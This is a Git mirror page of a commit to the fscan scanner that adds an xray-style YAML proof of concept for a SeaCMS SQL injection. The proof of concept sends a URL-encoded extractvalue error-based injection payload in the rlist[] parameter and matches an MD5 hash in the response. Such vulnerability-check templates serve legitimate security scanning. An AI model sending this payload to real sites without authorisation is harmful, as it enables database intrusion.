mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-seacms-sqli
|
||||
rules:
|
||||
- method: GET
|
||||
path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`
|
||||
follow_redirects: true
|
||||
expression: >
|
||||
response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99")
|
||||
detail:
|
||||
author: MaxSecurity(https://github.com/MaxSecurity)
|
||||
links:
|
||||
- https://www.uedbox.com/post/54561/
|
||||
Reference in New Issue
Block a user